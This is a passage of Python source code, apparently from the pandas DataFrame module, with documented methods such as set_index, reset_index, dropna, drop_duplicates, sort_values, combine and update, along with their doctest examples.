inplace : boolean, default False
Whether to return a new %(klass)s. If True then value of copy is
ignored.
level : int or level name, default None
In case of a MultiIndex, only rename labels in the specified
level.
Returns
-------
renamed : DataFrame
See Also
--------
pandas.DataFrame.rename_axis
Examples
--------
``DataFrame.rename`` supports two calling conventions
* ``(index=index_mapper, columns=columns_mapper, ...)``
* ``(mapper, axis={'index', 'columns'}, ...)``
We *highly* recommend using keyword arguments to clarify your
intent.
>>> df = pd.DataFrame({"A": [1, 2, 3], "B": [4, 5, 6]})
>>> df.rename(index=str, columns={"A": "a", "B": "c"})
a c
0 1 4
1 2 5
2 3 6
>>> df.rename(index=str, columns={"A": "a", "C": "c"})
a B
0 1 4
1 2 5
2 3 6
Using axis-style parameters
>>> df.rename(str.lower, axis='columns')
a b
0 1 4
1 2 5
2 3 6
>>> df.rename({1: 2, 2: 4}, axis='index')
A B
0 1 4
2 2 5
4 3 6
"""
axes = validate_axis_style_args(self, args, kwargs, 'mapper', 'rename')
kwargs.update(axes)
# Pop these, since the values are in `kwargs` under different names
kwargs.pop('axis', None)
kwargs.pop('mapper', None)
return super(DataFrame, self).rename(**kwargs)
@Appender(_shared_docs['fillna'] % _shared_doc_kwargs)
def fillna(self, value=None, method=None, axis=None, inplace=False,
limit=None, downcast=None, **kwargs):
return super(DataFrame,
self).fillna(value=value, method=method, axis=axis,
inplace=inplace, limit=limit,
downcast=downcast, **kwargs)
@Appender(_shared_docs['shift'] % _shared_doc_kwargs)
def shift(self, periods=1, freq=None, axis=0):
return super(DataFrame, self).shift(periods=periods, freq=freq,
axis=axis)
def set_index(self, keys, drop=True, append=False, inplace=False,
verify_integrity=False):
"""
Set the DataFrame index (row labels) using one or more existing
columns. By default yields a new object.
Parameters
----------
keys : column label or list of column labels / arrays
drop : boolean, default True
Delete columns to be used as the new index
append : boolean, default False
Whether to append columns to existing index
inplace : boolean, default False
Modify the DataFrame in place (do not create a new object)
verify_integrity : boolean, default False
Check the new index for duplicates. Otherwise defer the check until
necessary. Setting to False will improve the performance of this
method
Examples
--------
>>> df = pd.DataFrame({'month': [1, 4, 7, 10],
... 'year': [2012, 2014, 2013, 2014],
... 'sale':[55, 40, 84, 31]})
        >>> df
           month  sale  year
0 1 55 2012
1 4 40 2014
2 7 84 2013
3 10 31 2014
Set the index to become the 'month' column:
>>> df.set_index('month')
sale year
month
1 55 2012
4 40 2014
7 84 2013
10 31 2014
Create a multi-index using columns 'year' and 'month':
>>> df.set_index(['year', 'month'])
sale
year month
2012 1 55
2014 4 40
2013 7 84
2014 10 31
Create a multi-index using a set of values and a column:
>>> df.set_index([[1, 2, 3, 4], 'year'])
month sale
year
1 2012 1 55
2 2014 4 40
3 2013 7 84
4 2014 10 31
Returns
-------
dataframe : DataFrame
"""
inplace = validate_bool_kwarg(inplace, 'inplace')
if not isinstance(keys, list):
keys = [keys]
if inplace:
frame = self
else:
frame = self.copy()
arrays = []
names = []
if append:
names = [x for x in self.index.names]
if isinstance(self.index, MultiIndex):
for i in range(self.index.nlevels):
arrays.append(self.index._get_level_values(i))
else:
arrays.append(self.index)
to_remove = []
for col in keys:
if isinstance(col, MultiIndex):
# append all but the last column so we don't have to modify
# the end of this loop
for n in range(col.nlevels - 1):
arrays.append(col._get_level_values(n))
level = col._get_level_values(col.nlevels - 1)
names.extend(col.names)
elif isinstance(col, Series):
level = col._values
names.append(col.name)
elif isinstance(col, Index):
level = col
names.append(col.name)
elif isinstance(col, (list, np.ndarray, Index)):
level = col
names.append(None)
else:
level = frame[col]._values
names.append(col)
if drop:
to_remove.append(col)
arrays.append(level)
index = _ensure_index_from_sequences(arrays, names)
if verify_integrity and not index.is_unique:
duplicates = index.get_duplicates()
raise ValueError('Index has duplicate keys: %s' % duplicates)
for c in to_remove:
del frame[c]
# clear up memory usage
index._cleanup()
frame.index = index
if not inplace:
return frame
def reset_index(self, level=None, drop=False, inplace=False, col_level=0,
col_fill=''):
"""
For DataFrame with multi-level index, return new DataFrame with
labeling information in the columns under the index names, defaulting
to 'level_0', 'level_1', etc. if any are None. For a standard index,
the index name will be used (if set), otherwise a default 'index' or
'level_0' (if 'index' is already taken) will be used.
Parameters
----------
level : int, str, tuple, or list, default None
Only remove the given levels from the index. Removes all levels by
default
drop : boolean, default False
Do not try to insert index into dataframe columns. This resets
the index to the default integer index.
inplace : boolean, default False
Modify the DataFrame in place (do not create a new object)
col_level : int or str, default 0
If the columns have multiple levels, determines which level the
labels are inserted into. By default it is inserted into the first
level.
col_fill : object, default ''
If the columns have multiple levels, determines how the other
levels are named. If None then the index name is repeated.
Returns
-------
resetted : DataFrame
Examples
--------
>>> df = pd.DataFrame([('bird', 389.0),
... ('bird', 24.0),
... ('mammal', 80.5),
... ('mammal', np.nan)],
... index=['falcon', 'parrot', 'lion', 'monkey'],
... columns=('class', 'max_speed'))
>>> df
class max_speed
falcon bird 389.0
parrot bird 24.0
lion mammal 80.5
monkey mammal NaN
When we reset the index, the old index is added as a column, and a
new sequential index is used:
>>> df.reset_index()
index class max_speed
0 falcon bird 389.0
1 parrot bird 24.0
2 lion mammal 80.5
3 monkey mammal NaN
We can use the `drop` parameter to avoid the old index being added as
a column:
>>> df.reset_index(drop=True)
class max_speed
0 bird 389.0
1 bird 24.0
2 mammal 80.5
3 mammal NaN
You can also use `reset_index` with `MultiIndex`.
>>> index = pd.MultiIndex.from_tuples([('bird', 'falcon'),
... ('bird', 'parrot'),
... ('mammal', 'lion'),
... ('mammal', 'monkey')],
... names=['class', 'name'])
>>> columns = pd.MultiIndex.from_tuples([('speed', 'max'),
... ('species', 'type')])
>>> df = pd.DataFrame([(389.0, 'fly'),
... ( 24.0, 'fly'),
... ( 80.5, 'run'),
... (np.nan, 'jump')],
... index=index,
... columns=columns)
>>> df
speed species
max type
class name
bird falcon 389.0 fly
parrot 24.0 fly
mammal lion 80.5 run
monkey NaN jump
If the index has multiple levels, we can reset a subset of them:
>>> df.reset_index(level='class')
class speed species
max type
name
falcon bird 389.0 fly
parrot bird 24.0 fly
lion mammal 80.5 run
monkey mammal NaN jump
If we are not dropping the index, by default, it is placed in the top
level. We can place it in another level:
>>> df.reset_index(level='class', col_level=1)
speed species
class max type
name
falcon bird 389.0 fly
parrot bird 24.0 fly
lion mammal 80.5 run
monkey mammal NaN jump
When the index is inserted under another level, we can specify under
which one with the parameter `col_fill`:
>>> df.reset_index(level='class', col_level=1, col_fill='species')
species speed species
class max type
name
falcon bird 389.0 fly
parrot bird 24.0 fly
lion mammal 80.5 run
monkey mammal NaN jump
If we specify a nonexistent level for `col_fill`, it is created:
>>> df.reset_index(level='class', col_level=1, col_fill='genus')
genus speed species
class max type
name
falcon bird 389.0 fly
parrot bird 24.0 fly
lion mammal 80.5 run
monkey mammal NaN jump
"""
inplace = validate_bool_kwarg(inplace, 'inplace')
if inplace:
new_obj = self
else:
new_obj = self.copy()
def _maybe_casted_values(index, labels=None):
if isinstance(index, PeriodIndex):
values = index.astype(object).values
elif isinstance(index, DatetimeIndex) and index.tz is not None:
values = index
else:
values = index.values
if values.dtype == np.object_:
values = lib.maybe_convert_objects(values)
# if we have the labels, extract the values with a mask
if labels is not None:
mask = labels == -1
# we can have situations where the whole mask is -1,
# meaning there is nothing found in labels, so make all nan's
if mask.all():
values = np.empty(len(mask))
values.fill(np.nan)
else:
values = values.take(labels)
if mask.any():
values, changed = maybe_upcast_putmask(
values, mask, np.nan)
return values
new_index = _default_index(len(new_obj))
if level is not None:
if not isinstance(level, (tuple, list)):
level = [level]
level = [self.index._get_level_number(lev) for lev in level]
if isinstance(self.index, MultiIndex):
if len(level) < self.index.nlevels:
new_index = self.index.droplevel(level)
if not drop:
if isinstance(self.index, MultiIndex):
names = [n if n is not None else ('level_%d' % i)
for (i, n) in enumerate(self.index.names)]
to_insert = lzip(self.index.levels, self.index.labels)
else:
default = 'index' if 'index' not in self else 'level_0'
names = ([default] if self.index.name is None
else [self.index.name])
to_insert = ((self.index, None),)
multi_col = isinstance(self.columns, MultiIndex)
for i, (lev, lab) in reversed(list(enumerate(to_insert))):
if not (level is None or i in level):
continue
name = names[i]
if multi_col:
col_name = (list(name) if isinstance(name, tuple)
else [name])
if col_fill is None:
if len(col_name) not in (1, self.columns.nlevels):
raise ValueError("col_fill=None is incompatible "
"with incomplete column name "
"{}".format(name))
col_fill = col_name[0]
lev_num = self.columns._get_level_number(col_level)
name_lst = [col_fill] * lev_num + col_name
missing = self.columns.nlevels - len(name_lst)
name_lst += [col_fill] * missing
name = tuple(name_lst)
# to ndarray and maybe infer different dtype
level_values = _maybe_casted_values(lev, lab)
new_obj.insert(0, name, level_values)
new_obj.index = new_index
if not inplace:
return new_obj
# ----------------------------------------------------------------------
# Reindex-based selection methods
@Appender(_shared_docs['isna'] % _shared_doc_kwargs)
def isna(self):
return super(DataFrame, self).isna()
@Appender(_shared_docs['isna'] % _shared_doc_kwargs)
def isnull(self):
return super(DataFrame, self).isnull()
@Appender(_shared_docs['notna'] % _shared_doc_kwargs)
def notna(self):
return super(DataFrame, self).notna()
@Appender(_shared_docs['notna'] % _shared_doc_kwargs)
def notnull(self):
return super(DataFrame, self).notnull()
def dropna(self, axis=0, how='any', thresh=None, subset=None,
inplace=False):
"""
        Return object with labels on given axis omitted where any or all of
        the data are missing, depending on ``how``
Parameters
----------
axis : {0 or 'index', 1 or 'columns'}, or tuple/list thereof
Pass tuple or list to drop on multiple axes
how : {'any', 'all'}
* any : if any NA values are present, drop that label
* all : if all values are NA, drop that label
thresh : int, default None
int value : require that many non-NA values
subset : array-like
Labels along other axis to consider, e.g. if you are dropping rows
these would be a list of columns to include
inplace : boolean, default False
If True, do operation inplace and return None.
Returns
-------
dropped : DataFrame
Examples
--------
>>> df = pd.DataFrame([[np.nan, 2, np.nan, 0], [3, 4, np.nan, 1],
... [np.nan, np.nan, np.nan, 5]],
... columns=list('ABCD'))
>>> df
A B C D
0 NaN 2.0 NaN 0
1 3.0 4.0 NaN 1
2 NaN NaN NaN 5
Drop the columns where all elements are nan:
>>> df.dropna(axis=1, how='all')
A B D
0 NaN 2.0 0
1 3.0 4.0 1
2 NaN NaN 5
Drop the columns where any of the elements is nan
>>> df.dropna(axis=1, how='any')
D
0 0
1 1
2 5
Drop the rows where all of the elements are nan
(there is no row to drop, so df stays the same):
>>> df.dropna(axis=0, how='all')
A B C D
0 NaN 2.0 NaN 0
1 3.0 4.0 NaN 1
2 NaN NaN NaN 5
Keep only the rows with at least 2 non-na values:
>>> df.dropna(thresh=2)
A B C D
0 NaN 2.0 NaN 0
1 3.0 4.0 NaN 1
"""
inplace = validate_bool_kwarg(inplace, 'inplace')
if isinstance(axis, (tuple, list)):
result = self
for ax in axis:
result = result.dropna(how=how, thresh=thresh, subset=subset,
axis=ax)
else:
axis = self._get_axis_number(axis)
agg_axis = 1 - axis
agg_obj = self
if subset is not None:
ax = self._get_axis(agg_axis)
indices = ax.get_indexer_for(subset)
check = indices == -1
if check.any():
raise KeyError(list(np.compress(check, subset)))
agg_obj = self.take(indices, axis=agg_axis)
count = agg_obj.count(axis=agg_axis)
if thresh is not None:
mask = count >= thresh
elif how == 'any':
mask = count == len(agg_obj._get_axis(agg_axis))
elif how == 'all':
mask = count > 0
else:
if how is not None:
raise ValueError('invalid how option: %s' % how)
else:
raise TypeError('must specify how or thresh')
result = self._take(mask.nonzero()[0], axis=axis, convert=False)
if inplace:
self._update_inplace(result)
else:
return result
def drop_duplicates(self, subset=None, keep='first', inplace=False):
"""
Return DataFrame with duplicate rows removed, optionally only
considering certain columns
Parameters
----------
subset : column label or sequence of labels, optional
Only consider certain columns for identifying duplicates, by
default use all of the columns
keep : {'first', 'last', False}, default 'first'
- ``first`` : Drop duplicates except for the first occurrence.
- ``last`` : Drop duplicates except for the last occurrence.
- False : Drop all duplicates.
inplace : boolean, default False
Whether to drop duplicates in place or to return a copy
Returns
-------
deduplicated : DataFrame
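        Examples
        --------
        A minimal sketch:
        >>> df = pd.DataFrame({'a': [1, 1, 2], 'b': ['x', 'x', 'y']})
        >>> df.drop_duplicates()
           a  b
        0  1  x
        2  2  y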
"""
inplace = validate_bool_kwarg(inplace, 'inplace')
duplicated = self.duplicated(subset, keep=keep)
if inplace:
inds, = (-duplicated).nonzero()
new_data = self._data.take(inds)
self._update_inplace(new_data)
else:
return self[-duplicated]
def duplicated(self, subset=None, keep='first'):
"""
Return boolean Series denoting duplicate rows, optionally only
considering certain columns
Parameters
----------
subset : column label or sequence of labels, optional
Only consider certain columns for identifying duplicates, by
default use all of the columns
keep : {'first', 'last', False}, default 'first'
- ``first`` : Mark duplicates as ``True`` except for the
first occurrence.
- ``last`` : Mark duplicates as ``True`` except for the
last occurrence.
- False : Mark all duplicates as ``True``.
Returns
-------
duplicated : Series
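        Examples
        --------
        A minimal sketch:
        >>> df = pd.DataFrame({'a': [1, 1, 2], 'b': ['x', 'x', 'y']})
        >>> df.duplicated()
        0    False
        1     True
        2    False
        dtype: bool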
"""
from pandas.core.sorting import get_group_index
from pandas._libs.hashtable import duplicated_int64, _SIZE_HINT_LIMIT
def f(vals):
labels, shape = algorithms.factorize(
vals, size_hint=min(len(self), _SIZE_HINT_LIMIT))
return labels.astype('i8', copy=False), len(shape)
if subset is None:
subset = self.columns
elif (not np.iterable(subset) or
isinstance(subset, compat.string_types) or
isinstance(subset, tuple) and subset in self.columns):
subset = subset,
vals = (col.values for name, col in self.iteritems()
if name in subset)
labels, shape = map(list, zip(*map(f, vals)))
ids = get_group_index(labels, shape, sort=False, xnull=False)
return Series(duplicated_int64(ids, keep), index=self.index)
# ----------------------------------------------------------------------
# Sorting
@Appender(_shared_docs['sort_values'] % _shared_doc_kwargs)
def sort_values(self, by, axis=0, ascending=True, inplace=False,
kind='quicksort', na_position='last'):
inplace = validate_bool_kwarg(inplace, 'inplace')
axis = self._get_axis_number(axis)
other_axis = 0 if axis == 1 else 1
if not isinstance(by, list):
by = [by]
if is_sequence(ascending) and len(by) != len(ascending):
raise ValueError('Length of ascending (%d) != length of by (%d)' %
(len(ascending), len(by)))
if len(by) > 1:
from pandas.core.sorting import lexsort_indexer
keys = []
for x in by:
k = self.xs(x, axis=other_axis).values
if k.ndim == 2:
raise ValueError('Cannot sort by duplicate column %s' %
str(x))
keys.append(k)
indexer = lexsort_indexer(keys, orders=ascending,
na_position=na_position)
indexer = _ensure_platform_int(indexer)
else:
from pandas.core.sorting import nargsort
by = by[0]
k = self.xs(by, axis=other_axis).values
if k.ndim == 2:
# try to be helpful
if isinstance(self.columns, MultiIndex):
raise ValueError('Cannot sort by column %s in a '
'multi-index you need to explicitly '
'provide all the levels' % str(by))
raise ValueError('Cannot sort by duplicate column %s' %
str(by))
if isinstance(ascending, (tuple, list)):
ascending = ascending[0]
indexer = nargsort(k, kind=kind, ascending=ascending,
na_position=na_position)
new_data = self._data.take(indexer,
axis=self._get_block_manager_axis(axis),
verify=False)
if inplace:
return self._update_inplace(new_data)
else:
return self._constructor(new_data).__finalize__(self)
@Appender(_shared_docs['sort_index'] % _shared_doc_kwargs)
def sort_index(self, axis=0, level=None, ascending=True, inplace=False,
kind='quicksort', na_position='last', sort_remaining=True,
by=None):
# TODO: this can be combined with Series.sort_index impl as
# almost identical
inplace = validate_bool_kwarg(inplace, 'inplace')
# 10726
if by is not None:
warnings.warn("by argument to sort_index is deprecated, "
"please use .sort_values(by=...)",
FutureWarning, stacklevel=2)
if level is not None:
raise ValueError("unable to simultaneously sort by and level")
return self.sort_values(by, axis=axis, ascending=ascending,
inplace=inplace)
axis = self._get_axis_number(axis)
labels = self._get_axis(axis)
if level:
new_axis, indexer = labels.sortlevel(level, ascending=ascending,
sort_remaining=sort_remaining)
elif isinstance(labels, MultiIndex):
from pandas.core.sorting import lexsort_indexer
# make sure that the axis is lexsorted to start
# if not we need to reconstruct to get the correct indexer
labels = labels._sort_levels_monotonic()
indexer = lexsort_indexer(labels._get_labels_for_sorting(),
orders=ascending,
na_position=na_position)
else:
from pandas.core.sorting import nargsort
# Check monotonic-ness before sort an index
# GH11080
if ((ascending and labels.is_monotonic_increasing) or
(not ascending and labels.is_monotonic_decreasing)):
if inplace:
return
else:
return self.copy()
indexer = nargsort(labels, kind=kind, ascending=ascending,
na_position=na_position)
baxis = self._get_block_manager_axis(axis)
new_data = self._data.take(indexer,
axis=baxis,
verify=False)
# reconstruct axis if needed
new_data.axes[baxis] = new_data.axes[baxis]._sort_levels_monotonic()
if inplace:
return self._update_inplace(new_data)
else:
return self._constructor(new_data).__finalize__(self)
def sortlevel(self, level=0, axis=0, ascending=True, inplace=False,
sort_remaining=True):
"""
DEPRECATED: use :meth:`DataFrame.sort_index`
Sort multilevel index by chosen axis and primary level. Data will be
lexicographically sorted by the chosen level followed by the other
levels (in order)
Parameters
----------
level : int
axis : {0 or 'index', 1 or 'columns'}, default 0
ascending : boolean, default True
inplace : boolean, default False
Sort the DataFrame without creating a new instance
sort_remaining : boolean, default True
Sort by the other levels too.
Returns
-------
sorted : DataFrame
See Also
--------
DataFrame.sort_index(level=...)
"""
warnings.warn("sortlevel is deprecated, use sort_index(level= ...)",
FutureWarning, stacklevel=2)
return self.sort_index(level=level, axis=axis, ascending=ascending,
inplace=inplace, sort_remaining=sort_remaining)
def nlargest(self, n, columns, keep='first'):
"""Get the rows of a DataFrame sorted by the `n` largest
values of `columns`.
Parameters
----------
n : int
Number of items to retrieve
columns : list or str
Column name or names to order by
keep : {'first', 'last'}, default 'first'
Where there are duplicate values:
- ``first`` : take the first occurrence.
- ``last`` : take the last occurrence.
Returns
-------
DataFrame
Examples
--------
>>> df = pd.DataFrame({'a': [1, 10, 8, 11, -1],
... 'b': list('abdce'),
... 'c': [1.0, 2.0, np.nan, 3.0, 4.0]})
>>> df.nlargest(3, 'a')
a b c
3 11 c 3
1 10 b 2
2 8 d NaN
"""
return algorithms.SelectNFrame(self,
n=n,
keep=keep,
columns=columns).nlargest()
def nsmallest(self, n, columns, keep='first'):
"""Get the rows of a DataFrame sorted by the `n` smallest
values of `columns`.
Parameters
----------
n : int
Number of items to retrieve
columns : list or str
Column name or names to order by
keep : {'first', 'last'}, default 'first'
Where there are duplicate values:
- ``first`` : take the first occurrence.
- ``last`` : take the last occurrence.
Returns
-------
DataFrame
Examples
--------
>>> df = pd.DataFrame({'a': [1, 10, 8, 11, -1],
... 'b': list('abdce'),
... 'c': [1.0, 2.0, np.nan, 3.0, 4.0]})
>>> df.nsmallest(3, 'a')
a b c
4 -1 e 4
0 1 a 1
2 8 d NaN
"""
return algorithms.SelectNFrame(self,
n=n,
keep=keep,
columns=columns).nsmallest()
def swaplevel(self, i=-2, j=-1, axis=0):
"""
Swap levels i and j in a MultiIndex on a particular axis
Parameters
----------
i, j : int, string (can be mixed)
Level of index to be swapped. Can pass level name as string.
Returns
-------
swapped : type of caller (new object)
.. versionchanged:: 0.18.1
The indexes ``i`` and ``j`` are now optional, and default to
the two innermost levels of the index.
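        Examples
        --------
        A minimal sketch (the level names are illustrative):
        >>> idx = pd.MultiIndex.from_tuples([('a', 1), ('b', 2)],
        ...                                 names=['outer', 'inner'])
        >>> df = pd.DataFrame({'x': [10, 20]}, index=idx)
        >>> df.swaplevel('outer', 'inner').index.names
        FrozenList(['inner', 'outer'])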
"""
result = self.copy()
axis = self._get_axis_number(axis)
if axis == 0:
result.index = result.index.swaplevel(i, j)
else:
result.columns = result.columns.swaplevel(i, j)
return result
def reorder_levels(self, order, axis=0):
"""
Rearrange index levels using input order.
May not drop or duplicate levels
Parameters
----------
order : list of int or list of str
List representing new level order. Reference level by number
(position) or by key (label).
axis : int
Where to reorder levels.
Returns
-------
type of caller (new object)
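        Examples
        --------
        A minimal sketch (the level names are illustrative):
        >>> idx = pd.MultiIndex.from_tuples([('a', 1), ('b', 2)],
        ...                                 names=['outer', 'inner'])
        >>> df = pd.DataFrame({'x': [10, 20]}, index=idx)
        >>> df.reorder_levels(['inner', 'outer']).index.names
        FrozenList(['inner', 'outer'])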
"""
axis = self._get_axis_number(axis)
if not isinstance(self._get_axis(axis),
MultiIndex): # pragma: no cover
raise TypeError('Can only reorder levels on a hierarchical axis.')
result = self.copy()
if axis == 0:
result.index = result.index.reorder_levels(order)
else:
result.columns = result.columns.reorder_levels(order)
return result
# ----------------------------------------------------------------------
# Arithmetic / combination related
def _combine_frame(self, other, func, fill_value=None, level=None,
try_cast=True):
this, other = self.align(other, join='outer', level=level, copy=False)
new_index, new_columns = this.index, this.columns
def _arith_op(left, right):
if fill_value is not None:
left_mask = isna(left)
right_mask = isna(right)
left = left.copy()
right = right.copy()
# one but not both
mask = left_mask ^ right_mask
left[left_mask & mask] = fill_value
right[right_mask & mask] = fill_value
return func(left, right)
if this._is_mixed_type or other._is_mixed_type:
# unique
if this.columns.is_unique:
def f(col):
r = _arith_op(this[col].values, other[col].values)
return self._constructor_sliced(r, index=new_index,
dtype=r.dtype)
result = {col: f(col) for col in this}
# non-unique
else:
def f(i):
r = _arith_op(this.iloc[:, i].values,
other.iloc[:, i].values)
return self._constructor_sliced(r, index=new_index,
dtype=r.dtype)
result = {i: f(i) for i, col in enumerate(this.columns)}
result = self._constructor(result, index=new_index, copy=False)
result.columns = new_columns
return result
else:
result = _arith_op(this.values, other.values)
return self._constructor(result, index=new_index, columns=new_columns,
copy=False)
def _combine_series(self, other, func, fill_value=None, axis=None,
level=None, try_cast=True):
if axis is not None:
axis = self._get_axis_name(axis)
if axis == 'index':
return self._combine_match_index(other, func, level=level,
fill_value=fill_value,
try_cast=try_cast)
else:
return self._combine_match_columns(other, func, level=level,
fill_value=fill_value,
try_cast=try_cast)
return self._combine_series_infer(other, func, level=level,
fill_value=fill_value,
try_cast=try_cast)
def _combine_series_infer(self, other, func, level=None,
fill_value=None, try_cast=True):
if len(other) == 0:
return self * np.nan
if len(self) == 0:
# Ambiguous case, use _series so works with DataFrame
return self._constructor(data=self._series, index=self.index,
columns=self.columns)
return self._combine_match_columns(other, func, level=level,
fill_value=fill_value,
try_cast=try_cast)
def _combine_match_index(self, other, func, level=None,
fill_value=None, try_cast=True):
left, right = self.align(other, join='outer', axis=0, level=level,
copy=False)
if fill_value is not None:
raise NotImplementedError("fill_value %r not supported." %
fill_value)
return self._constructor(func(left.values.T, right.values).T,
index=left.index, columns=self.columns,
copy=False)
def _combine_match_columns(self, other, func, level=None,
fill_value=None, try_cast=True):
left, right = self.align(other, join='outer', axis=1, level=level,
copy=False)
if fill_value is not None:
raise NotImplementedError("fill_value %r not supported" %
fill_value)
new_data = left._data.eval(func=func, other=right,
axes=[left.columns, self.index],
try_cast=try_cast)
return self._constructor(new_data)
def _combine_const(self, other, func, errors='raise', try_cast=True):
new_data = self._data.eval(func=func, other=other,
errors=errors,
try_cast=try_cast)
return self._constructor(new_data)
def _compare_frame_evaluate(self, other, func, str_rep, try_cast=True):
import pandas.core.computation.expressions as expressions
# unique
if self.columns.is_unique:
def _compare(a, b):
return {col: func(a[col], b[col]) for col in a.columns}
new_data = expressions.evaluate(_compare, str_rep, self, other)
return self._constructor(data=new_data, index=self.index,
columns=self.columns, copy=False)
# non-unique
else:
def _compare(a, b):
return {i: func(a.iloc[:, i], b.iloc[:, i])
for i, col in enumerate(a.columns)}
new_data = expressions.evaluate(_compare, str_rep, self, other)
result = self._constructor(data=new_data, index=self.index,
copy=False)
result.columns = self.columns
return result
def _compare_frame(self, other, func, str_rep, try_cast=True):
if not self._indexed_same(other):
raise ValueError('Can only compare identically-labeled '
'DataFrame objects')
return self._compare_frame_evaluate(other, func, str_rep,
try_cast=try_cast)
def _flex_compare_frame(self, other, func, str_rep, level, try_cast=True):
if not self._indexed_same(other):
self, other = self.align(other, 'outer', level=level, copy=False)
return self._compare_frame_evaluate(other, func, str_rep,
try_cast=try_cast)
def combine(self, other, func, fill_value=None, overwrite=True):
"""
Add two DataFrame objects and do not propagate NaN values, so if for a
(column, time) one frame is missing a value, it will default to the
other frame's value (which might be NaN as well)
Parameters
----------
other : DataFrame
func : function
Function that takes two series as inputs and returns a Series or a
scalar
fill_value : scalar value
overwrite : boolean, default True
If True then overwrite values for common keys in the calling frame
Returns
-------
result : DataFrame
Examples
--------
>>> df1 = DataFrame({'A': [0, 0], 'B': [4, 4]})
>>> df2 = DataFrame({'A': [1, 1], 'B': [3, 3]})
>>> df1.combine(df2, lambda s1, s2: s1 if s1.sum() < s2.sum() else s2)
A B
0 0 3
1 0 3
See Also
--------
DataFrame.combine_first : Combine two DataFrame objects and default to
non-null values in frame calling the method
"""
other_idxlen = len(other.index) # save for compare
this, other = self.align(other, copy=False)
new_index = this.index
if other.empty and len(new_index) == len(self.index):
return self.copy()
if self.empty and len(other) == other_idxlen:
return other.copy()
# sorts if possible
new_columns = this.columns.union(other.columns)
do_fill = fill_value is not None
result = {}
for col in new_columns:
series = this[col]
otherSeries = other[col]
this_dtype = series.dtype
other_dtype = otherSeries.dtype
this_mask = isna(series)
other_mask = isna(otherSeries)
# don't overwrite columns unnecessarily
# DO propagate if this column is not in the intersection
if not overwrite and other_mask.all():
result[col] = this[col].copy()
continue
if do_fill:
series = series.copy()
otherSeries = otherSeries.copy()
series[this_mask] = fill_value
otherSeries[other_mask] = fill_value
# if we have different dtypes, possibly promote
new_dtype = this_dtype
if not is_dtype_equal(this_dtype, other_dtype):
new_dtype = find_common_type([this_dtype, other_dtype])
if not is_dtype_equal(this_dtype, new_dtype):
series = series.astype(new_dtype)
if not is_dtype_equal(other_dtype, new_dtype):
otherSeries = otherSeries.astype(new_dtype)
# see if we need to be represented as i8 (datetimelike)
# try to keep us at this dtype
needs_i8_conversion_i = needs_i8_conversion(new_dtype)
if needs_i8_conversion_i:
arr = func(series, otherSeries, True)
else:
arr = func(series, otherSeries)
if do_fill:
arr = _ensure_float(arr)
arr[this_mask & other_mask] = np.nan
# try to downcast back to the original dtype
if needs_i8_conversion_i:
# TODO: this conversion should be handled in
# _maybe_cast_to_datetime, but the change affects a lot of code ...
if is_datetime64tz_dtype(new_dtype):
arr = DatetimeIndex._simple_new(arr, tz=new_dtype.tz)
else:
arr = maybe_cast_to_datetime(arr, new_dtype)
else:
arr = maybe_downcast_to_dtype(arr, this_dtype)
result[col] = arr
# convert_objects just in case
return self._constructor(result, index=new_index,
columns=new_columns)._convert(datetime=True,
copy=False)
def combine_first(self, other):
"""
Combine two DataFrame objects and default to non-null values in frame
calling the method. Result index columns will be the union of the
respective indexes and columns
Parameters
----------
other : DataFrame
Returns
-------
combined : DataFrame
Examples
--------
df1's values prioritized, use values from df2 to fill holes:
>>> df1 = pd.DataFrame([[1, np.nan]])
>>> df2 = pd.DataFrame([[3, 4]])
>>> df1.combine_first(df2)
0 1
0 1 4.0
See Also
--------
DataFrame.combine : Perform series-wise operation on two DataFrames
using a given function
"""
import pandas.core.computation.expressions as expressions
def combiner(x, y, needs_i8_conversion=False):
x_values = x.values if hasattr(x, 'values') else x
y_values = y.values if hasattr(y, 'values') else y
if needs_i8_conversion:
mask = isna(x)
x_values = x_values.view('i8')
y_values = y_values.view('i8')
else:
mask = isna(x_values)
return expressions.where(mask, y_values, x_values)
return self.combine(other, combiner, overwrite=False)
def update(self, other, join='left', overwrite=True, filter_func=None,
raise_conflict=False):
"""
Modify DataFrame in place using non-NA values from passed
DataFrame. Aligns on indices
Parameters
----------
other : DataFrame, or object coercible into a DataFrame
join : {'left'}, default 'left'
overwrite : boolean, default True
If True then overwrite values for common keys in the calling frame
filter_func : callable(1d-array) -> 1d-array<boolean>, default None
Can choose to replace values other than NA. Return True for values
that should be updated
raise_conflict : boolean
If True, will raise an error if the DataFrame and other both
contain data in the same place.
Examples
--------
>>> df = pd.DataFrame({'A': [1, 2, 3],
... 'B': [400, 500, 600]})
>>> new_df = pd.DataFrame({'B': [4, 5, 6],
... 'C': [7, 8, 9]})
>>> df.update(new_df)
>>> df
A B
0 1 4
1 2 5
2 3 6
>>> df = pd.DataFrame({'A': ['a', 'b', 'c'],
... 'B': ['x', 'y', 'z']})
>>> new_df = pd.DataFrame({'B': ['d', 'e', 'f', 'g', 'h', 'i']})
>>> df.update(new_df)
>>> df
A B
0 a d
1 b e
2 c f
>>> df = pd.DataFrame({'A': ['a', 'b', 'c'],
... 'B': ['x', 'y', 'z']})
>>> new_column = pd.Series(['d', 'e'], name='B', index=[0, 2])
>>> df.update(new_column)
>>> df
A B
0 a d
1 b y
2 c e
>>> df = pd.DataFrame({'A': ['a', 'b', 'c'],
... 'B': ['x', 'y', 'z']})
>>> new_df = pd.DataFrame({'B': ['d', 'e']}, index=[1, 2])
>>> df.update(new_df)
>>> df
A B
0 a x
1 b d
2 c e
If ``other`` contains NaNs the corresponding values are not updated
in the original dataframe.
>>> df = pd.DataFrame({'A': [1, 2, 3],
... 'B': [400, 500, 600]})
>>> new_df = pd.DataFrame({'B': [4, np.nan, 6]})
>>> df.update(new_df)
>>> df
A B
0 1 4.0
1 2 500.0
2 3 6.0
"""
import pandas.core.computation.expressions as expressions
# TODO: Support other joins
if join != 'left': # pragma: no cover
raise NotImplementedError("Only left join is supported")
if not isinstance(other, DataFrame):
other = DataFrame(other)
other = other.reindex_like(self)
for col in self.columns:
this = self[col].values
that = other[col].values
if filter_func is not None:
with np.errstate(all='ignore'):
mask = ~filter_func(this) | isna(that)
else:
if raise_conflict:
mask_this = notna(that)
mask_that = notna(this)
if any(mask_this & mask_that):
raise ValueError("Data overlaps.")
if overwrite:
mask = isna(that)
else:
mask = notna(this)
# don't overwrite columns unnecessarily
if mask.all():
continue
self[col] = expressions.where(mask, this, that)
# ----------------------------------------------------------------------
# Misc methods
def _get_valid_indices(self):
is_valid = self.count(1) > 0
return self.index[is_valid]
@Appender(_shared_docs['valid_index'] % {
'position': 'first', 'klass': 'DataFrame'})
def first_valid_index(self):
if len(self) == 0:
return None
